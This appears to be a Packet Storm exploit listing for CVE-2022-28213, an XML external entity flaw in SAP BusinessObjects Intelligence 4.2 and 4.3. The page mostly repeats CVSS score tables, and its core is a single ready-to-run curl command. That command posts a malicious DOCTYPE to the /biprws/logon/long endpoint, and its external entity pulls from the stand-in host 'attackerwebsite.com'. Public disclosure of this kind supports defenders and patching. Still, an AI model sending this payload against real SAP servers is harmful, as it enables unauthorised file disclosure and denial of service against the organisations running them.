Lucene search

K
packetstormWest ShepherdPACKETSTORM:167046
HistoryMay 11, 2022 - 12:00 a.m.

SAP BusinessObjects Intelligence 4.3 XML Injection

2022-05-1100:00:00
West Shepherd
packetstormsecurity.com
208

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

5.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:N/A:P

`# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)  
# Google Dork: N/A  
# Date: 4/21/2022  
# Exploit Author: West Shepherd  
# Vendor Homepage: https://www.sap.com/  
# Software Link: https://www.sap.com/  
# Version: 4.2 and 4.3  
# Tested on: Windows Server 2019 x64  
# CVE : CVE-2022-28213  
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md  
  
curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \  
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %  
remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \  
https://example.com/biprws/logon/long  
  
`

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

5.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:N/A:P

Related for PACKETSTORM:167046